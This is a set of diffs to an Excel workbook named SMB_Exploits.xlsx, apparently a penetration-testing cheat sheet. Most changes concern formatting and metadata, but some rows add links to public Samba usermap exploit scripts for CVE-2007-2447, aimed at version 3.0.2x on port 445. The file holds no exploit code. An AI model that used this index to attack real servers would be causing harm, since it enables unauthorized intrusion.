--- a/SMB_Exploits.xlsx
+++ b/SMB_Exploits.xlsx
@@ -1,22 +1,21 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22827"/>
-  <workbookPr defaultThemeVersion="166925"/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
+  <fileVersion appName="xl" lastEdited="6" lowestEdited="7" rupBuild="14420"/>
+  <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\TM05550141\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B529866D-3B6B-48C5-B988-BA245173B524}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{E7B9498E-1FA0-4F2B-9942-6EE472CF637D}"/>
+    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7905"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
     <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
   </sheets>
-  <calcPr calcId="191029"/>
+  <calcPr calcId="152511"/>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -32,7 +31,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="96" uniqueCount="65">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="103" uniqueCount="68">
   <si>
     <t>Services</t>
   </si>
@@ -437,12 +436,21 @@
   </si>
   <si>
     <t>Grooms 13</t>
+  </si>
+  <si>
+    <t>samba-usermap-exploit</t>
+  </si>
+  <si>
+    <t>https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py</t>
+  </si>
+  <si>
+    <t>v 3.0.2x</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <fonts count="9" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
@@ -557,7 +565,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="16">
+  <cellXfs count="15">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -571,9 +579,6 @@
       <alignment horizontal="center" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="1" applyFont="1" applyBorder="1"/>
-    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
     <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1"/>
     <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
@@ -906,11 +911,11 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{43DC0064-C729-4F4D-8C0E-C3B78F42D4DB}">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A2:K16"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="B1" workbookViewId="0">
-      <selection activeCell="J10" sqref="J10"/>
+    <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
+      <selection activeCell="G15" sqref="G15"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -926,36 +931,36 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B2" s="14" t="s">
+      <c r="B2" s="13" t="s">
         <v>9</v>
       </c>
-      <c r="C2" s="14"/>
-      <c r="D2" s="14"/>
-      <c r="E2" s="14"/>
-      <c r="F2" s="14"/>
-      <c r="G2" s="9" t="s">
+      <c r="C2" s="13"/>
+      <c r="D2" s="13"/>
+      <c r="E2" s="13"/>
+      <c r="F2" s="13"/>
+      <c r="G2" s="8" t="s">
         <v>18</v>
       </c>
     </row>
     <row r="3" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B3" s="12"/>
-      <c r="C3" s="12"/>
-      <c r="D3" s="12"/>
-      <c r="E3" s="12"/>
-      <c r="F3" s="12"/>
-      <c r="G3" s="9"/>
+      <c r="B3" s="11"/>
+      <c r="C3" s="11"/>
+      <c r="D3" s="11"/>
+      <c r="E3" s="11"/>
+      <c r="F3" s="11"/>
+      <c r="G3" s="8"/>
     </row>
     <row r="4" spans="1:11" x14ac:dyDescent="0.25">
-      <c r="B4" s="15" t="s">
+      <c r="B4" s="14" t="s">
         <v>43</v>
       </c>
-      <c r="C4" s="15"/>
-      <c r="D4" s="15"/>
-      <c r="E4" s="15"/>
-      <c r="F4" s="11" t="s">
+      <c r="C4" s="14"/>
+      <c r="D4" s="14"/>
+      <c r="E4" s="14"/>
+      <c r="F4" s="10" t="s">
         <v>59</v>
       </c>
-      <c r="G4" s="9" t="s">
+      <c r="G4" s="8" t="s">
         <v>57</v>
       </c>
       <c r="H4" t="s">
@@ -1032,7 +1037,7 @@
       <c r="I7" s="5" t="s">
         <v>4</v>
       </c>
-      <c r="J7" s="8" t="s">
+      <c r="J7" s="7" t="s">
         <v>17</v>
       </c>
       <c r="K7" s="2"/>
@@ -1166,7 +1171,7 @@
       <c r="F12" s="4" t="s">
         <v>51</v>
       </c>
-      <c r="G12" s="13" t="s">
+      <c r="G12" s="12" t="s">
         <v>50</v>
       </c>
       <c r="H12" s="5" t="s">
@@ -1193,7 +1198,7 @@
       <c r="F13" s="4" t="s">
         <v>51</v>
       </c>
-      <c r="G13" s="13" t="s">
+      <c r="G13" s="12" t="s">
         <v>50</v>
       </c>
       <c r="H13" s="5" t="s">
@@ -1220,7 +1225,7 @@
       <c r="F14" s="4" t="s">
         <v>51</v>
       </c>
-      <c r="G14" s="13" t="s">
+      <c r="G14" s="12" t="s">
         <v>50</v>
       </c>
       <c r="H14" s="5" t="s">
@@ -1248,21 +1253,37 @@
         <v>63</v>
       </c>
       <c r="G15" s="4"/>
-      <c r="H15" s="4"/>
+      <c r="H15" s="5" t="s">
+        <v>13</v>
+      </c>
       <c r="I15" s="5"/>
       <c r="J15" s="2"/>
       <c r="K15" s="2"/>
     </row>
     <row r="16" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A16" s="2"/>
-      <c r="B16" s="2"/>
-      <c r="C16" s="7"/>
-      <c r="D16" s="7"/>
-      <c r="E16" s="2"/>
-      <c r="F16" s="2"/>
-      <c r="G16" s="2"/>
-      <c r="H16" s="2"/>
-      <c r="I16" s="7"/>
+      <c r="B16" s="5">
+        <v>445</v>
+      </c>
+      <c r="C16" s="5" t="s">
+        <v>61</v>
+      </c>
+      <c r="D16" s="5" t="s">
+        <v>67</v>
+      </c>
+      <c r="E16" s="4"/>
+      <c r="F16" s="4" t="s">
+        <v>65</v>
+      </c>
+      <c r="G16" s="12" t="s">
+        <v>66</v>
+      </c>
+      <c r="H16" s="5" t="s">
+        <v>13</v>
+      </c>
+      <c r="I16" s="5" t="s">
+        <v>49</v>
+      </c>
       <c r="J16" s="2"/>
       <c r="K16" s="2"/>
     </row>
@@ -1272,24 +1293,25 @@
     <mergeCell ref="B4:E4"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="G8" r:id="rId1" xr:uid="{2954BB1E-912A-482A-BB4E-60DBE6273044}"/>
-    <hyperlink ref="G7" r:id="rId2" xr:uid="{66991D41-7CBA-465C-9103-BB2A2F15124F}"/>
-    <hyperlink ref="G2" r:id="rId3" xr:uid="{74C50D77-E1BA-4EB1-B611-273D0209D373}"/>
-    <hyperlink ref="G9" r:id="rId4" xr:uid="{EF0FC957-C3F0-4593-B96A-7B479A40F841}"/>
-    <hyperlink ref="G10" r:id="rId5" xr:uid="{E8D79C4C-4505-4642-B7C2-611880435149}"/>
-    <hyperlink ref="G11" r:id="rId6" xr:uid="{B8B5DB13-5799-41CB-83D0-2031017858C3}"/>
-    <hyperlink ref="G12" r:id="rId7" xr:uid="{0370BEB5-F4BE-44A2-9FE3-0270E0C2800F}"/>
-    <hyperlink ref="G13" r:id="rId8" xr:uid="{B4E5849A-C136-4AF7-8548-B4482545E7B9}"/>
-    <hyperlink ref="G14" r:id="rId9" xr:uid="{404CBC8E-B18A-481A-8938-7C75962E6E4F}"/>
-    <hyperlink ref="G4" r:id="rId10" xr:uid="{068D4B2E-A7CB-42E6-87BD-8220FA15068E}"/>
+    <hyperlink ref="G8" r:id="rId1"/>
+    <hyperlink ref="G7" r:id="rId2"/>
+    <hyperlink ref="G2" r:id="rId3"/>
+    <hyperlink ref="G9" r:id="rId4"/>
+    <hyperlink ref="G10" r:id="rId5"/>
+    <hyperlink ref="G11" r:id="rId6"/>
+    <hyperlink ref="G12" r:id="rId7"/>
+    <hyperlink ref="G13" r:id="rId8"/>
+    <hyperlink ref="G14" r:id="rId9"/>
+    <hyperlink ref="G4" r:id="rId10"/>
+    <hyperlink ref="G16" r:id="rId11"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
-  <pageSetup orientation="portrait" r:id="rId11"/>
+  <pageSetup orientation="portrait" r:id="rId12"/>
 </worksheet>
 </file>
 
 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{E1AF4A58-EB1F-4283-A0D0-F4C20B5DE12A}">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:A19"/>
   <sheetViews>
     <sheetView workbookViewId="0">
@@ -1302,97 +1324,97 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A1" s="10" t="s">
+      <c r="A1" s="9" t="s">
         <v>21</v>
       </c>
     </row>
     <row r="2" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A2" s="10" t="s">
+      <c r="A2" s="9" t="s">
         <v>22</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A3" s="10" t="s">
+      <c r="A3" s="9" t="s">
         <v>23</v>
       </c>
     </row>
     <row r="4" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A4" s="10" t="s">
+      <c r="A4" s="9" t="s">
         <v>24</v>
       </c>
     </row>
     <row r="5" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A5" s="10" t="s">
+      <c r="A5" s="9" t="s">
         <v>25</v>
       </c>
     </row>
     <row r="6" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A6" s="10" t="s">
+      <c r="A6" s="9" t="s">
         <v>26</v>
       </c>
     </row>
     <row r="7" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A7" s="10" t="s">
+      <c r="A7" s="9" t="s">
         <v>27</v>
       </c>
     </row>
     <row r="8" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A8" s="10" t="s">
+      <c r="A8" s="9" t="s">
         <v>28</v>
       </c>
     </row>
     <row r="9" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A9" s="10" t="s">
+      <c r="A9" s="9" t="s">
         <v>29</v>
       </c>
     </row>
     <row r="10" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A10" s="10" t="s">
+      <c r="A10" s="9" t="s">
         <v>30</v>
       </c>
     </row>
     <row r="11" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A11" s="10" t="s">
+      <c r="A11" s="9" t="s">
         <v>31</v>
       </c>
     </row>
     <row r="12" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A12" s="10" t="s">
+      <c r="A12" s="9" t="s">
         <v>32</v>
       </c>
     </row>
     <row r="13" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A13" s="10" t="s">
+      <c r="A13" s="9" t="s">
         <v>33</v>
       </c>
     </row>
     <row r="14" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A14" s="10" t="s">
+      <c r="A14" s="9" t="s">
         <v>34</v>
       </c>
     </row>
     <row r="15" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A15" s="10" t="s">
+      <c r="A15" s="9" t="s">
         <v>35</v>
       </c>
     </row>
     <row r="16" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A16" s="10" t="s">
+      <c r="A16" s="9" t="s">
         <v>36</v>
       </c>
     </row>
     <row r="17" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A17" s="10" t="s">
+      <c r="A17" s="9" t="s">
         <v>37</v>
       </c>
     </row>
     <row r="18" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A18" s="10" t="s">
+      <c r="A18" s="9" t="s">
         <v>38</v>
       </c>
     </row>
     <row r="19" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
-      <c r="A19" s="10" t="s">
+      <c r="A19" s="9" t="s">
         <v>39</v>
       </c>
     </row>

--- a/SMB_Exploits.xlsx
+++ b/SMB_Exploits.xlsx
@@ -1,15 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="7" rupBuild="14420"/>
-  <workbookPr/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="23001"/>
+  <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\TM05550141\Downloads\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\Download\"/>
     </mc:Choice>
   </mc:AlternateContent>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0E05913B-1502-4DF7-94C8-BBD97640AC1B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7905"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -20,18 +21,12 @@
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
     </ext>
-    <ext xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures" uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}">
-      <xcalcf:calcFeatures>
-        <xcalcf:feature name="microsoft.com:RD"/>
-        <xcalcf:feature name="microsoft.com:FV"/>
-      </xcalcf:calcFeatures>
-    </ext>
   </extLst>
 </workbook>
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="103" uniqueCount="68">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="110" uniqueCount="69">
   <si>
     <t>Services</t>
   </si>
@@ -445,12 +440,15 @@
   </si>
   <si>
     <t>v 3.0.2x</t>
+  </si>
+  <si>
+    <t>https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
   <fonts count="9" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
@@ -565,7 +563,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="15">
+  <cellXfs count="16">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -597,6 +595,7 @@
     <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="2">
     <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
@@ -911,11 +910,11 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A2:K16"/>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
+  <dimension ref="A2:K17"/>
   <sheetViews>
     <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
-      <selection activeCell="G15" sqref="G15"/>
+      <selection activeCell="B17" sqref="B17"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1287,31 +1286,56 @@
       <c r="J16" s="2"/>
       <c r="K16" s="2"/>
     </row>
+    <row r="17" spans="2:9" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B17" s="15" t="s">
+        <v>62</v>
+      </c>
+      <c r="C17" s="5" t="s">
+        <v>61</v>
+      </c>
+      <c r="D17" s="5" t="s">
+        <v>67</v>
+      </c>
+      <c r="E17" s="4"/>
+      <c r="F17" s="4" t="s">
+        <v>65</v>
+      </c>
+      <c r="G17" s="8" t="s">
+        <v>68</v>
+      </c>
+      <c r="H17" s="5" t="s">
+        <v>13</v>
+      </c>
+      <c r="I17" s="5" t="s">
+        <v>49</v>
+      </c>
+    </row>
   </sheetData>
   <mergeCells count="2">
     <mergeCell ref="B2:F2"/>
     <mergeCell ref="B4:E4"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="G8" r:id="rId1"/>
-    <hyperlink ref="G7" r:id="rId2"/>
-    <hyperlink ref="G2" r:id="rId3"/>
-    <hyperlink ref="G9" r:id="rId4"/>
-    <hyperlink ref="G10" r:id="rId5"/>
-    <hyperlink ref="G11" r:id="rId6"/>
-    <hyperlink ref="G12" r:id="rId7"/>
-    <hyperlink ref="G13" r:id="rId8"/>
-    <hyperlink ref="G14" r:id="rId9"/>
-    <hyperlink ref="G4" r:id="rId10"/>
-    <hyperlink ref="G16" r:id="rId11"/>
+    <hyperlink ref="G8" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
+    <hyperlink ref="G7" r:id="rId2" xr:uid="{00000000-0004-0000-0000-000001000000}"/>
+    <hyperlink ref="G2" r:id="rId3" xr:uid="{00000000-0004-0000-0000-000002000000}"/>
+    <hyperlink ref="G9" r:id="rId4" xr:uid="{00000000-0004-0000-0000-000003000000}"/>
+    <hyperlink ref="G10" r:id="rId5" xr:uid="{00000000-0004-0000-0000-000004000000}"/>
+    <hyperlink ref="G11" r:id="rId6" xr:uid="{00000000-0004-0000-0000-000005000000}"/>
+    <hyperlink ref="G12" r:id="rId7" xr:uid="{00000000-0004-0000-0000-000006000000}"/>
+    <hyperlink ref="G13" r:id="rId8" xr:uid="{00000000-0004-0000-0000-000007000000}"/>
+    <hyperlink ref="G14" r:id="rId9" xr:uid="{00000000-0004-0000-0000-000008000000}"/>
+    <hyperlink ref="G4" r:id="rId10" xr:uid="{00000000-0004-0000-0000-000009000000}"/>
+    <hyperlink ref="G16" r:id="rId11" xr:uid="{00000000-0004-0000-0000-00000A000000}"/>
+    <hyperlink ref="G17" r:id="rId12" xr:uid="{F90627F5-38C7-481B-86A9-6F902D90064F}"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
-  <pageSetup orientation="portrait" r:id="rId12"/>
+  <pageSetup orientation="portrait" r:id="rId13"/>
 </worksheet>
 </file>
 
 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0100-000000000000}">
   <dimension ref="A1:A19"/>
   <sheetViews>
     <sheetView workbookViewId="0">

--- a/SMB_Exploits.xlsx
+++ b/SMB_Exploits.xlsx
@@ -5,10 +5,10 @@
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\Download\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0E05913B-1502-4DF7-94C8-BBD97640AC1B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{33FBE3F6-49C2-409F-91F3-7D1F8E047C0C}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
